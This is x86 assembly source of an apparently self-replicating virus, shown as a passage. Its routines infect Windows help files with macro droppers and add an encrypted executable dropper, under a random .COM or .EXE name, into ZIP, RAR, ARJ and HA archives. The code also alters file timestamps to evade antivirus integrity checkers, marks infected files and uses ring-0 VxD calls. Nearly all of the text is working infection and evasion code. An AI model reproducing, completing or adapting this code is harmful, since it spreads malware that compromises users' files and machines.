ADD [ESI.FILE_HEADER_RESERVEDSPACE],EAX ;7. WRITE MACRO HEADERS+OUR MACRO IN THE END OF MODULE LEA ECX,[EAX+SIZE FILE_HEADER+SIZE SYSTEM_HEADER] CALL HLP_WRITE_FILE POP EDI JB INF_EXIT LODSD ;FILE_HEADER_RESERVEDSPACE SUB EAX,ECX ;8. 
REWRITE OLD "SYSTEM" DATA IN THE END OF MODULE MOV CX,LEN_IOBUFF-4 WRITE_NEXT_BLK: SUB EAX,ECX JAE IS_LONG_DATA ADD ECX,EAX XOR EAX,EAX IS_LONG_DATA: PUSH EAX MOV EAX,EDI ADD EDI,ECX CALL READ_FILE JB EXIT_READWRITE CALL HLP_WRITE_FILE EXIT_READWRITE: POP EAX JB WAS_ERROR AND EAX,EAX JNE WRITE_NEXT_BLK ;9. WRITE CORRECTED HLP_HEADER (VIA WRITE_FILE) LEA ESI,HLP_HEADER[EDX] PUSH SIZE HLP_START POP ECX CALL WRITE_FILE ;ASSUME THAT EAX=0 ;10. CREATE AND WRITE ENCRYPTED DROPPER IN THE END OF FILE (VIA HLP_WRITE_FILE) CALL SPE_THUNK ;ECX=LENGTH OF DROPPER PUSH ECX ESI LEA EDI,FIRST_DROP_MASK[EDX] MOV AX,[EDI] ENCRYPT_HDROP: XOR [ESI],AX ADD AX,RELO_MASK2[EDI] INC ESI LOOP ENCRYPT_HDROP POP ESI ECX CALL HLP_WRITE_FILE ;11. WRITE HLP_DIRECTORY WITH CORRECTED OFFSET OF "SYSTEM" BLOCK LEA ESI,HLP_DIRECTORY[EDX] MOV EAX,[ESI.HLP_START_DIRECTORYSTART-SIZE HLP_START] MOV CX,LEN_HLP_DIR AND 0FF00H ;------------------------------------------------ SET_WRITE_FILE: CALL SET_DATE JMP WRITE_FILE ;------------------------------------------------ READ_FILE_BUFF_0: XOR EAX,EAX READ_FILE_BUFF: LEA ESI,MAIN_BUFF[EDX] MOV CX,SIZE_MBUFF JMP READ_FILE ;------------------------------------------------ ZIP_READ_FILE: ADD EAX,ZIP_CUR_OFF[EDX] MOV ZIP_CUR_OFF[EDX],EAX ;ENTRY: EAX=POS,ECX=LENGTH,EBX=HANDLE,ESI=&BUFFER4READ ;EXIT: CF=1 IF ERROR AND EAX=ERROR CODE OR EAX=(REAL BYTES READ-LENGTH) READ_FILE PROC PUSH EDX MOV DX,R0_READFILE GO_READ: XCHG EAX,EDX CALL FILE_IO POP EDX JB WAS_ERROR SUB EAX,ECX WAS_ERROR: RET ENDP ;------------------------------------------------ HLP_WRITE_FILE: MOV EAX,[HLP_HEADER.HLP_START_ENTIREFILESIZE][EDX] ADD [HLP_HEADER.HLP_START_ENTIREFILESIZE][EDX],ECX ;------------------------------------------------ WRITE_FILE: PUSH EDX MOV DX,R0_WRITEFILE JMP GO_READ ;------------------------------------------------ SET_DATE: XOR 1 PTR [ESP+8],1 ;CHANGE TIME FOR FOOLING ADINF/AVPI SET_TIME: PUSH EAX CALL GET_SYS_TIME MOV INF_TIME[EDX],EAX POP EAX RETN 
;------------------------------------------------ ;ENTRY: EDI=&BUFFER FOR STORING MACROS ;EXIT: EAX=LENGTH OF MACRO GEN_MACROS PROC PUSH EBX ESI EBP EDI LEA EDI,TEMP_EXT[EDX] CALL GEN_EXT ;EAX = 0 LEA EDI,RDROP_NAME[EDX] CALL GEN_NAME MOV EAX,'MOC.' STOSD XOR AL,AL STOSB CALL GET_RANDOM_MSK XCHG EAX,ECX CALL GET_RANDOM_MSK MOV AH,CL ADD AX,'AA' LEA ESI,RUN_DROPPER[EDX] LEA EDI,MAIN_BUFF[EDX] MOV 2 PTR DS:UU_MASK[ESI],AX MOV CL,LEN_UUD REP MOVSB MOV CL,LEN_RDROP_CON XCHG EAX,EBX UUE_BYTE: LODSB PUSH EAX SHR AL,4 ADD AL,BL STOSB POP EAX AND AL,0FH ADD AL,BH STOSB LOOP UUE_BYTE POP EDI PUSH EDI LEA ESI,RR_MACRO[EDX] CALL HLP_STORE LEA ESI,MAIN_BUFF[EDX] XOR EBP,EBP ;FIRST ITERATION MOV EBX,(LEN_UUD+2*LEN_RDROP_CON) ;LENGTH OF MACROS NEXT_ITER: PUSH ESI CALL HLP_STORE_DROP DEC EDI ;SKIP '\0' MOV CL,HLP_LEN_LINE SUB EBX,ECX JAE NO_LAST_STR ADD ECX,EBX XOR EBX,EBX NO_LAST_STR: POP ESI REP MOVSB CMP ECX,EBP XCHG EAX,EBP ;LENGTH ADDRESS MOV AL,'>' STOSB JE FIRST_ITER STOSB FIRST_ITER: CALL MACRO_FNAME PUSH ESI CALL HLP_STORE_SLEEP POP ESI AND EBX,EBX JNE NEXT_ITER CALL HLP_STORE_DROP DEC EDI ;SKIP '\0' DEC EDI MOV 4 PTR [EDI-4],' NER' XCHG EAX,EBP CALL MACRO_FNAME MOV AX,'* ' STOSW MOV EAX,'MOC.' 
STOSD PUSH EAX CALL HLP_STORE_SLEEP LEA ESI,EXEC_MACRO_1[EDX] CALL HLP_STORE DEC EDI ;SKIP '\0' XCHG EAX,EBP ;LENGTH ADDRESS CALL MACRO_FNAME POP 4 PTR [EDI-4] MOV CL,LEN_EXEC_2 REP MOVSB CALL CORR_LENGTH XCHG EAX,EDI POP EDI SUB EAX,EDI ;LENGTH POP EBP ESI EBX RET ENDP ;------------------------------------------------ HLP_STORE_SLEEP: MOV EAX,')0,"' STOSD MOV AX,")'" STOSW CALL CORR_LENGTH LEA ESI,SLEEP_MACRO[EDX] JMP HLP_STORE HLP_STORE_DROP: LEA ESI,DROP_MACRO[EDX] HLP_STORE PROC PUSH ID_CONFIG POP EAX STOSW PUSH EDI XOR EAX,EAX STOSW XCHG EAX,ECX PUSH ESI LEA ESI,CHK_NT[EDX] MOV CL,LEN_CHK_NT REP MOVSB POP ESI MOV CL,LEN_CHK_NT SZ_STORE: LODSB STOSB INC ECX AND AL,AL JNE SZ_STORE POP EAX MOV [EAX],CX RET ENDP ;-------------------------------------- ;RETURN: EAX - ENTRY TO INTRUDING NO_ENDP: MOV ECX,EBX JECXZ LIST_EMPTY XCHG EAX,ECX CALL GET_RANDOM MOV EAX,[ESP+EAX*4] CLEAR_STACK: POP ESI DEC EBX JNE CLEAR_STACK LIST_EMPTY: POP EBX RETN FIND_PLACE: PUSH EBX XOR EBX,EBX FIND_ENDP: LODSB CMP AL,0C3H ;RETN JE FOUND_RETN CMP AL,0C2H ;RETN X LOOPNE FIND_ENDP JNE NO_ENDP INC ESI ;SKIP X INC ESI DEC ECX FOUND_RETN: DEC ECX CMP ECX,0FH+LEN_LOADER JL NO_ENDP PUSH ESI ADD ESI,3 AND ESI,NOT 3 FIND_PROC: LODSB CMP AL,55H ;PUSH BP JNE NO_PUSH_BP CMP 2 PTR [ESI],0EC8BH JE FOUND_PROC CMP 2 PTR [ESI],0E589H JE FOUND_PROC NO_PUSH_BP: CMP AL,0C8H ;ENTER X,0 JNE NO_ENTER CMP CH,[ESI+2] JE FOUND_PROC NO_ENTER: CMP AL,53H ;PUSH EBX JNE NO_PUSH_EBX CMP 2 PTR [ESI],5756H ;PUSH ESI/PUSH EDI JE FOUND_PROC NO_PUSH_EBX: AND AL,NOT 2 CMP AL,81H JNE NO_SUBADD CMP 1 PTR [ESI],0ECH ;SUB ESP,X JE FOUND_PROC NO_SUBADD: ADD ESI,3 MOV EAX,ESI AND AL,0CH JE FIND_PROC CMP AL,8 JAE FIND_PROC FOUND_PROC: XCHG EAX,ESI POP ESI JNE FIND_ENDP DEC EAX PUSH EAX ESI ECX XCHG EAX,ESI MOV CX,LEN_LOADER FIND_ENDP_X: LODSB AND AL,NOT 1 CMP AL,0C2H ;RETN/RETN X LOOPNE FIND_ENDP_X POP ECX ESI EAX JE FIND_ENDP PUSH EAX INC EBX JMP FIND_ENDP ;------------------------------------------------ ;ENTRY: EDI=&NAME BUFFER 
GEN_NAME PROC MOV AL,3 CALL GET_RANDOM_BYTE GEN_EXT: ADD AL,3 ;3-5 LETTERS XCHG EAX,ECX PUSH ECX NEXT_RCHAR: MOV AL,'Z'-'A'+1 CALL GET_RANDOM_BYTE ADD AL,'A' STOSB LOOP NEXT_RCHAR POP ECX RET ENDP ;------------------------------------------------ ;ENTRY: EDX=MEM DELTA ;EXIT: ECX=LENGTH OF DROPPER (EBX,EDX PRESERVED),ESI=&ENCRYPT_BUFF SPE_THUNK PROC PUSH EBX EDX LEA EDI,RET_2_32[EDX] XOR EAX,EAX PUSH EAX DEC EAX SHRD EAX,EDX,16 PUSH EAX SHR EDX,16 INC EAX ;0 XCHG AL,DL PUSH DX MOV AH,10011010B ;P=1/DPL=0/S=1/NON-CONF/READ=1/ACCESS=0 PUSH AX MOV ESI,ALLOCATE_GDT_SELECTOR PUSH ESI CALL VXD_CALL XCHG EAX,EBX ;CODE SELECTOR MOV 1 PTR [ESP+1],10010010B ;P=1/DPL=0/S=1/DATA/TOP/WRITE=1/ACCESS=0 PUSH ESI CALL VXD_CALL ADD ESP,3*4 CLI MOV DS,AX MOV ES,AX INC ESI ;FREE_GDT_SELECTOR XOR ECX,ECX PUSH ECX EBX ESI EAX EBP CS EDI BX SMALL OFF_SPE DB 66H RETF GOFF RET_2_32 PUSH SS SS POP DS ES STI POP EBP ESI EBX PUSH EBX CALL VXD_CALL POP EAX PUSH ESI EBX CALL VXD_CALL MOVZX ECX,DI POP EAX EAX EDX EBX LEA ESI,ENCRYPT_BUFF[EDX] RET ENDP ;------------------------------------------------ GOFF INF_RAR CMP 4 PTR [ESI],RAR_SIGN JNE EXIT_RAR_TOP ADD ESI,7+3 TEST 1 PTR [ESI],1 ;VOLUME JNE EXIT_RAR_TOP AND 1 PTR [ESI],NOT 20H ;SKIP AUTHEN. BIT MOV CL,SIZE RAR_HEAD_HDR-2 DEC ESI CALL GET_CRC32 DEC ESI DEC ESI MOV [ESI],AX MOV CL,SIZE RAR_HEAD_HDR PUSH 7 POP EAX CALL WRITE_FILE JB EXIT_RAR_TOP MOV AL,7 ADD AX,[ESI.RAR_HEAD_SIZE] READ_RAR_FH: PUSH SIZE RAR_FILE_HDR POP ECX CALL ZIP_READ_FILE JNB RAR_READ_OK AND AL,AL JS GO_RAR_DONE EXIT_RAR_TOP: RETN RAR_READ_OK: CMP [ESI.RAR_F_HEAD_TYPE],RAR_FILE_SIGN GO_RAR_DONE: JNE RAR_DONE MOV AL,1 PTR [ESI.RAR_F_HEAD_FLAGS] AND AL,11100000B CMP AL,11100000B ;DIR? 
JE SKIP_EXE_RAR INC 4 PTR ZIP_FILE_COUNTER[EDX] CMP [ESI.RAR_METHOD],RAR_STORED JNE NO_INF_RAR CMP CH,1 PTR [ESI.RAR_FILE_TIME] JNE NO_INF_RAR CMP 2 PTR [ESI.RAR_FILE_DATE],TROJAN_STAMP JNE EXIT_RAR_TOP ADD EAX,LARGE 4 PTR RAR_FNAME+TROJAN_NAME_SIZE LEA ESI,MAIN_BUFF[EDX] MOV CX,SIZE_MBUFF PUSH ESI JMP ZIP_READ_FILE ;RUN TROJAN NO_INF_RAR: ADD CX,[ESI.RAR_FNAME_SIZE] LEA EDI,OUR_RAR_FHEADER.RAR_FNAME[EDX] PUSH ESI LARGE 4 PTR RAR_FNAME LARGE 4 PTR '\' CALL TEST_EXEC POP ESI JB SKIP_EXE_RAR PUSH ESI LEA EDI,OUR_RAR_FHEADER.RAR_HOST_OS[EDX] LEA ESI,[ESI.RAR_HOST_OS] MOV [EDI-RAR_HOST_OS+RAR_F_HEAD_TYPE],RAR_FILE_SIGN MOV [EDI-RAR_HOST_OS+RAR_F_HEAD_FLAGS+1],80H MOVSB CMPSD MOVSD MOV [EDI-4],DL MOVSB MOV AL,RAR_STORED STOSB MOV EAX,ECX STOSW ADD AX,SIZE RAR_FILE_HDR MOV [EDI-RAR_FILE_ATTRIB+RAR_F_HEAD_SIZE],AX POP ESI SKIP_EXE_RAR: MOVZX EAX,[ESI.RAR_F_HEAD_SIZE] ADD EAX,[ESI.RAR_COMPRESSED_SIZE] JMP READ_RAR_FH RAR_DONE: CALL CHECK_ARCOUNT JB GO_EXIT_ZIP_TOP PUSH ESI ECX LEA ESI,OUR_RAR_FHEADER[EDX]+2 MOV [ESI.RAR_COMPRESSED_SIZE-2],ECX MOV [ESI.RAR_ORIGINAL_SIZE-2],ECX MOV [ESI.RAR_CRC32-2],EAX MOV CX,[ESI.RAR_F_HEAD_SIZE-2] DEC ECX DEC ECX CALL GET_CRC32 DEC ESI DEC ESI MOV [ESI],AX INC ECX INC ECX CALL ZIP1_INSERT_FILE POP ECX ESI GO_EXIT_ZIP_TOP: JB EXIT_ZIP_TOP SET_INSERT: CALL SET_DATE ;------------------------------------------------ ;ENTRY: ESI=DATA FOR WRITE,ECX=SIZEOF(ESI),EAX=POS IN FILE ZIP1_INSERT_FILE: MOV EAX,ZIP_CUR_OFF[EDX] ZIP_INSERT_FILE: ADD ZIP_CENTRAL_OFF[EDX],ECX ADD ZIP_CUR_OFF[EDX],ECX INSERT_FILE: PUSH ESI EDI ECX EAX CALL GETSIZE_FILE XCHG EDI,EAX MOV CX,LEN_IOBUFF INSERT_NEXT: SUB EDI,ECX CMP EDI,[ESP] JAE FULL_INSBUFF ADD ECX,EDI MOV EDI,[ESP] SUB ECX,EDI FULL_INSBUFF: LEA ESI,INSERT_BUFF[EDX] MOV EAX,EDI CALL READ_FILE JB INS_POP MOV EAX,[ESP+4] ADD EAX,EDI CALL WRITE_FILE JB INS_POP CMP EDI,[ESP] JNE INSERT_NEXT INS_POP: POP EAX ECX EDI ESI JNB WRITE_FILE EXIT_ZIP_TOP: RET ;------------------------------------------------ GOFF INF_ZIP 
;1. FIND CENTRAL AREA FIND_ZCENTRAL: CMP [ESI.ZIP_LOC_SIGN_],ZIP_LOCAL_SIGN JNE EXIT_ZIP_TOP MOV CL,SIZE ZIP_CENTRAL_HEADER MOV AL,SIZE ZIP_LOCAL_HEADER ADD EAX,[ESI.ZIP_COMPRESSED_SIZE] ADD AX,[ESI.ZIP_SIZE_FNAME] ADD AX,[ESI.ZIP_EXTRA_FIELD_LENGTH] CALL ZIP_READ_FILE JB EXIT_ZIP_TOP CMP [ESI.ZIP_CENTR_SIGN_],ZIP_CENTRAL_SIGN JNE FIND_ZCENTRAL PUSH 4 PTR ZIP_CUR_OFF[EDX] POP 4 PTR ZIP_CENTRAL_OFF[EDX] ;2. FIND END HEADER AND CHECK FILE COUNTER (AND IF EXECUTABLE FILE PRESENT) FIND_ZEND: TEST 1 PTR [ESI.ZIP_EXTRNL_FILE_ATTR_],FA_DIRECTORY JNE SKIP_EXE_TEST INC 4 PTR ZIP_FILE_COUNTER[EDX] CMP AL,1 PTR [ESI.ZIP_FILE_TIME_] JNE CONT_CHECK CMP AX,[ESI.ZIP_COMPRESSION_METHOD_] JE EXIT_ZIP_TOP CONT_CHECK: ADD CX,[ESI.ZIP_SIZE_FNAME_] LEA EDI,OUR_LOCAL_HEADER.ZIP_LOCAL_FNAME[EDX] PUSH ESI LARGE 4 PTR ZIP_CENTRAL_FNAME LARGE 4 PTR '/' CALL TEST_EXEC JB SKIP_EXE_TEST_POP MOV OUR_LOCAL_HEADER.ZIP_SIZE_FNAME[EDX],CX LEA EDI,OUR_CENTRAL_HEADER.ZIP_CENTRAL_FNAME[EDX] MOV OUR_CENTRAL_HEADER.ZIP_SIZE_FNAME_[EDX],CX REP MOVSB POP ESI LEA EDI,OUR_LOCAL_HEADER[EDX] MOV EAX,ZIP_LOCAL_SIGN STOSD MOV EAX,4 PTR [ESI.ZIP_VER_NED_TO_EXTR] STOSD INC EDI INC EDI MOV EAX,4 PTR [ESI.ZIP_FILE_TIME_] XOR AL,AL STOSD LEA EDI,OUR_CENTRAL_HEADER[EDX] PUSH ESI MOVSD MOVSD MOVSD MOV [EDI-2],CX MOVSD MOV [EDI-4],CL SKIP_EXE_TEST_POP: POP ESI SKIP_EXE_TEST: MOV CL,SIZE ZIP_CENTRAL_HEADER MOV EAX,ECX ADD AX,[ESI.ZIP_SIZE_FNAME_] ADD AX,[ESI.ZIP_EXTRA_FIELD_LENGTH_] ADD AX,[ESI.ZIP_FILE_COMMENT_LENGTH_] CALL ZIP_READ_FILE JNB ZIP_READ_OK AND AL,AL JS ZIP_READ_OK EXIT_ZIP: RETN ZIP_READ_OK: CMP [ESI.ZIP_CENTR_SIGN_],ZIP_CENTRAL_SIGN JE FIND_ZEND CMP [ESI.ZIP_END_SIGN_],ZIP_END_SIGN JNE EXIT_ZIP CALL CHECK_ARCOUNT JB EXIT_ZIP ;3. 
GENERATE DROPPER AND INSERT LOCAL HEADER+DROPPER AT ZIP_CENTRAL_OFF
; (tail of INF_ZIP; the routine starts above this chunk and the text above is
;  the end of its ";3." step comment.  On entry here EAX = CRC32 and
;  ECX = length of the generated dropper, EDX = code base.)
        PUSH    ESI ECX
        LEA     ESI,OUR_LOCAL_HEADER[EDX]
        MOV     [ESI.ZIP_CRC_32],EAX
        MOV     [ESI.ZIP_COMPRESSED_SIZE],ECX
        MOV     [ESI.ZIP_UNCOMPRESSED_SIZE],ECX         ; stored entry: both sizes equal
        LEA     EDI,OUR_CENTRAL_HEADER[EDX]
        MOV     [EDI.ZIP_CRC_32_],EAX
        MOV     [EDI.ZIP_COMPRESSED_SIZE_],ECX
        MOV     [EDI.ZIP_UNCOMPRESSED_SIZE_],ECX
        MOV     EAX,ZIP_CENTRAL_OFF[EDX]
        MOV     [EDI.ZIP_REL_OFF_OF_LOC_HDR_],EAX       ; new local header is placed where the central dir used to start
        PUSH    SIZE ZIP_LOCAL_HEADER
        POP     ECX
        ADD     CX,[ESI.ZIP_SIZE_FNAME]
        CALL    ZIP_INSERT_FILE
        POP     ECX ESI
        JB      EXIT_ZIP
        MOV     EAX,ZIP_CENTRAL_OFF[EDX]
        CALL    ZIP_INSERT_FILE
GO_EXIT_ZIP:
        JB      EXIT_ZIP
;4. INSERT CENTRAL HEADER AT ZIP_CUR_OFF (ZIP_END_OFF)
        MOV     ESI,EDI
        PUSH    SIZE ZIP_CENTRAL_HEADER
        POP     ECX
        ADD     CX,[ESI.ZIP_SIZE_FNAME_]
        PUSH    4 PTR ZIP_CENTRAL_OFF[EDX]
        CALL    ZIP1_INSERT_FILE
        LEA     ESI,BUFF_ZIP_HEADER[EDX]
        POP     [ESI.OFF_OF_STRT_OF_CENT_DIRECTORY]     ; end record now points at the shifted central dir
        JB      GO_EXIT_ZIP
;5. WRITE END HEADER AT ZIP_CUR_OFF (NEW ZIP_END_OFF)
        ADD     [ESI.SIZE_OF_THE_CENTRAL_DIRECTORY],ECX
        INC     [ESI.TTL_NUM_OF_ENT_ON_THIS_DISK]
        INC     [ESI.TTL_NUM_OF_ENT_IN_THE_CENT_DIR]
        PUSH    SIZE ZIP_END_HEADER
        POP     ECX
        MOV     EAX,ZIP_CUR_OFF[EDX]
GO_WRITE_FILE:
        JMP     SET_WRITE_FILE
;------------------------------------------------
; TEST_EXEC / TEST_EXEC_SPEC - decide whether an archive entry is an
; executable and, if it is the first one seen, derive the dropper's name
; from it.  Both stack parameters are removed by the RETN 2*4.
;   FNAME_OFF      - offset of the file name inside the read buffer (TEST_EXEC only)
;   PATH_SEPARATOR - byte that separates directory from name ('/' for ARJ, 0 for HA)
; ZIP_EXEC_FLAG must be 0 on entry (only the first executable entry is used as
; the template); it is incremented on success.  CF=1 on any rejection.
; NOTE: CMP DL,... is used as a compare-with-zero; it relies on EDX (the code
; base) having a zero low byte, which holds for the page-aligned resident copy.
FNAME_OFF       = 4 PTR [ESP+8]
PATH_SEPARATOR  = 4 PTR [ESP+4]
;ENTRY: ESI=WORK BUFFER,EDI=&NAME BUFFER,ECX=READ LENGTH
;EXIT: ESI=STORED PATH+NAME,ECX=SIZEOF(EDI)
TEST_EXEC:
        MOV     EAX,ZIP_CUR_OFF[EDX]
        CALL    READ_FILE
        JB      TEST_ERR
        SUB     ECX,FNAME_OFF
        ADD     ESI,FNAME_OFF
TEST_EXEC_SPEC:
        CMP     DL,ZIP_EXEC_FLAG[EDX]           ; an executable was already taken? -> reject
        JNE     TEST_ERR_STC
        MOV     EAX,[ESI+ECX-4]                 ; last four name bytes
        OR      EAX,20202000H                   ; lower-case the extension, keep the '.'
        CMP     EAX,'moc.'                      ; ".com"
        JE      IS_EXECUTABLE
        CMP     EAX,'exe.'                      ; ".exe"
TEST_ERR_STC:
        STC
        JNE     TEST_ERR
IS_EXECUTABLE:
        MOV     EAX,PATH_SEPARATOR
STORE_PATH:
        CMP     AL,[ESI+ECX-1]                  ; scan backwards for the last separator
        LOOPNE  STORE_PATH
        JNE     NO_ARC_PATH                     ; none: ECX=0, no directory prefix
        INC     ECX                             ; ECX = length including the separator
NO_ARC_PATH:
        PUSH    EDI ECX
        REP     MOVSB                           ; copy directory prefix into the name buffer
        CALL    GEN_NAME                        ; (not in this chunk) generates the base name, ECX = its length
        MOV     AL,2
        CALL    GET_RANDOM_BYTE                 ; 0 or 1
        MOV     EAX,'MOC.'
        JE      IS_ARC_COM
        MOV     EAX,'EXE.'
IS_ARC_COM:
        STOSD                                   ; append ".COM" / ".EXE"
        POP     EAX ESI
        ADD     ECX,EAX
        ADD     ECX,4                           ; ECX = prefix + name + extension
        INC     1 PTR ZIP_EXEC_FLAG[EDX]
TEST_ERR:
        RETN    2*4
;------------------------------------------------
; CHECK_ARCOUNT - archive is a candidate only if it holds at least
; MIN_ARC_FILES entries and exactly one executable template was recorded.
; It then CALLs SPE_THUNK (not in this chunk) to build the dropper and FALLS
; THROUGH into GET_CRC32, so on a successful return EAX = CRC32 of the
; dropper and ECX = its length (ESI/ECX as left by SPE_THUNK).  CF=1 on reject.
CHECK_ARCOUNT:
        CMP     4 PTR ZIP_FILE_COUNTER[EDX],MIN_ARC_FILES
        JB      ERR_INS
        SUB     1 PTR ZIP_EXEC_FLAG[EDX],1
        JB      ERR_INS
        CALL    SPE_THUNK
;------------------------------------------------
;ENTRY: ESI=&STRING,ECX=STRLEN
;EXIT: EAX=CRC32
; Bit-serial CRC-32 (reflected polynomial 0EDB88320H, initial value -1,
; final complement) - the CRC used by ZIP/ARJ/HA.  ECX must be non-zero:
; LOOP decrements before testing, so ECX=0 would run over 2^32 bytes.
; ERR_INS_POP / ERR_INS are shared exit labels used by INF_ARJ below.
GET_CRC32 PROC
        PUSH    ESI EBX ECX
        XOR     EBX,EBX
        DEC     EBX                             ; crc = 0FFFFFFFFH
NEXT_BYTE:
        PUSH    ECX
        XOR     EAX,EAX
        LODSB
        XOR     AL,BL                           ; byte ^ low byte of crc
        PUSH    8
        POP     ECX
        SHR     EBX,CL                          ; crc >>= 8
NEXT_BIT:
        SHR     EAX,1
        JNB     NO_ODD
        XOR     EAX,0EDB88320H
NO_ODD:
        LOOP    NEXT_BIT
        XOR     EBX,EAX
        POP     ECX
        LOOP    NEXT_BYTE
        XCHG    EBX,EAX
        NOT     EAX
        POP     ECX EBX
ERR_INS_POP:
        POP     ESI
ERR_INS:
        RET
ENDP
;------------------------------------------------
; INF_ARJ - walk an ARJ archive's local headers; count files, pick the first
; stored .COM/.EXE entry as the template for a new stored entry, then append
; the dropper.  EAX on each ZIP_READ_FILE call appears to be the distance to
; advance the archive cursor before reading (0 for the first header, then
; header / extended-header / data sizes) - ZIP_READ_FILE is not in this
; chunk, verify.  A stored entry whose time low byte is already 0 is treated
; as "already infected" and aborts (the same marker is written below).
        GOFF    INF_ARJ
        XOR     EAX,EAX
READ_ARJ_FH:
        MOV     CX,SIZE ARJ_HDR_STRUC+MAX_PATH+12
        CALL    ZIP_READ_FILE
        JNB     ARJ_READ_OK
        ADD     ECX,EAX                         ; short read: accept only if at least 4 bytes came back
        JNB     ERR_INS
        CMP     ECX,4
        JB      ERR_INS
ARJ_READ_OK:
        CMP     [ESI.ARJ_HEADER_ID],ARJ_SIGN
        JNE     ERR_INS
        XOR     EAX,EAX
        CMP     [ESI.ARJ_BAS_HDR_SIZE],AX       ; size 0 = end-of-archive header
        JE      ARJ_DONE
        TEST    [ESI.ARJ_FLAGS],4               ;VOLUME_FLAG
        JNE     ERR_INS                         ; multi-volume archives are left alone
        CMP     [ESI.ARJ_FILE_TYPE],1           ;BINARY/TEXT
        JA      SKIP_EXE_ARJ                    ; directories etc. are not counted
        INC     4 PTR ZIP_FILE_COUNTER[EDX]
        CMP     AL,[ESI.ARJ_COMPRESS_METHOD]    ;ARJ_STORED
        JNE     NO_INF_ARJ
        CMP     AL,1 PTR [ESI.ARJ_FILE_TIME]    ; stored + zero time byte = our marker -> abort
        JE      ERR_INS
NO_INF_ARJ:
        LEA     EDI,[ESI.ARJ_FNAME]
        TEST    [ESI.ARJ_FLAGS],8               ;EXTFILE_FLAG
        JE      NO_ARJ_EXT
        SCASD                                   ; skip the 4-byte extended file position
NO_ARJ_EXT:
        SUB     ECX,LARGE 4 PTR ARJ_FNAME
        JB      ERR_INS
        PUSH    ESI
        MOV     ESI,EDI
        REPNE   SCASB                           ; find the name's terminator within the bytes read
        LEA     ECX,[EDI-1]
        JNE     ERR_INS_POP                     ; unterminated name -> reject
        SUB     ECX,ESI                         ; ECX = name length
        LEA     EDI,OUR_ARJ_FHEADER.ARJ_FNAME[EDX]
        PUSH    EAX LARGE 4 PTR '/'
        CALL    TEST_EXEC_SPEC
        POP     ESI
        JB      SKIP_EXE_ARJ
        LEA     EDI,OUR_ARJ_FHEADER[EDX]        ; build our local header from the template entry
        MOV     [EDI.ARJ_ENTRYNAME_POS],AX
        MOV     AX,ARJ_SIGN
        STOSD
        ADD     ECX,SIZE ARJ_HDR_STRUC-4+2
        MOV     [EDI-2],CX                      ; basic header size
        MOV     OUR_ARJ_FH_LEN[EDX],ECX
        MOV     AL,1EH                          ; first_hdr_size
        STOSB
        MOV     EAX,4 PTR [ESI.ARJ_VER_NUM]     ; version / min version / host OS / flags
        STOSD
        AND     1 PTR [EDI-1],10H               ; keep only PATHSYM_FLAG
        MOV     EAX,4 PTR [ESI.ARJ_FILE_TIME]
        XOR     AL,AL                           ; zero time low byte = infection marker
        MOV     [EDI+3],EAX
SKIP_EXE_ARJ:
        MOVZX   EAX,[ESI.ARJ_BAS_HDR_SIZE]
        ADD     EAX,8                           ; id(2)+size(2)+basic header+crc(4)
NEXT_ARJ_EXT:
        PUSH    2
        POP     ECX
        CALL    ZIP_READ_FILE                   ; read the next extended-header size word
        JB      EXIT_ARJ
        CMP     AX,[ESI]
        XCHG    EAX,ECX
        JE      END_ARJ_EXT                     ; size word 0 = no more extended headers
        ADD     AX,[ESI]
        ADD     EAX,4                           ; skip header + its CRC
        JMP     NEXT_ARJ_EXT
END_ARJ_EXT:
        CMP     [ESI.ARJ_FILE_TYPE],1
        JA      GO_READ_ARJ_FH
        ADD     EAX,[ESI.ARJ_COMPRESSED_SIZE]   ; skip the entry's data
GO_READ_ARJ_FH:
        JMP     READ_ARJ_FH
ARJ_DONE:
        CALL    CHECK_ARCOUNT                   ; EAX = dropper CRC32, ECX = dropper length
        JB      EXIT_ARJ
        PUSH    ESI ECX
        LEA     ESI,OUR_ARJ_FHEADER[EDX+4]
        MOV     [ESI.ARJ_COMPRESSED_SIZE-4],ECX
        MOV     [ESI.ARJ_ORIGINAL_SIZE-4],ECX
        MOV     [ESI.ARJ_CRC32-4],EAX
        MOV     ECX,12345678H
        GOFF    OUR_ARJ_FH_LEN,4                ; immediate patched with the header length
        CALL    GET_CRC32                       ; basic-header CRC
        MOV     [ESI+ECX],EAX
        ADD     ECX,10                          ; + header CRC(4) + 1st ext size(2) + id/size(4)
        SUB     ESI,4
        CALL    ZIP1_INSERT_FILE
        POP     ECX ESI
        JNB     SET_INSERT
EXIT_ARJ:
        RETN
;------------------------------------------------
; INF_HA - same scheme for HA archives.  The file count is bumped in the
; in-memory main header (CMPSD just advances ESI/EDI by 4, flags are ignored)
; and written back at the end; entries are separated by NUL-terminated path
; and name strings followed by a machine-info block.
        GOFF    INF_HA
        CMP     [ESI.HA_M_SIGN],HA_SIGN
        JNE     EXIT_ARJ
        CMPSD                                   ;ADD ESI,SIZE HA_MAIN_HEADER
        INC     2 PTR [ESI-2]                   ;INC 2 PTR [ESI.HA_M_FILE_CNT]
        MOV     AL,4                            ; first advance = main header size
READ_HA_FH:
        XOR     ECX,ECX
        MOV     CL,SIZE HA_FILE_HEADER+MAX_DOS_PATH
        CALL    ZIP_READ_FILE
        JNB     HA_READ_OK
        ADD     ECX,EAX
        JNB     EXIT_ARJ
        JE      HA_DONE                         ; exactly at end of archive
HA_READ_OK:
        AND     [ESI.HA_VER_METHOD],0FH         ; keep the method nibble (in the buffer only)
        JNE     NO_INF_HA
        CMP     DL,1 PTR [ESI.HA_FILE_TIME]     ; stored + zero time byte = our marker -> abort
        JE      EXIT_ARJ
NO_INF_HA:
        LEA     EDI,[ESI.HA_PATH]
        SUB     ECX,LARGE 4 PTR HA_PATH
        JB      EXIT_ARJ
        XOR     EAX,EAX
        REPNE   SCASB                           ; skip path
        JNE     EXIT_ARJ
        REPNE   SCASB                           ; skip name
        JNE     EXIT_ARJ
        LEA     ECX,[EDI-1]                     ; ECX = &name terminator
        MOV     AL,[EDI]                        ; machine-info length
        INC     EAX
        SUB     EDI,ESI
        ADD     EDI,EAX                         ; EDI = total header length
        PUSH    EDI
        CMP     [ESI.HA_VER_METHOD],0EH         ; directory entry
        JE      SKIP_EXE_HA
        INC     4 PTR ZIP_FILE_COUNTER[EDX]
        MOV     AH,[ECX+2]                      ; host system byte of the template
        PUSH    ESI
        LEA     ESI,[ESI.HA_PATH]
        SUB     ECX,ESI
        LEA     EDI,OUR_HA_FHEADER.HA_PATH[EDX]
        PUSH    EAX EAX LARGE 0                 ; separator 0; third push is balanced by the POP below
        CALL    TEST_EXEC_SPEC
        POP     EAX
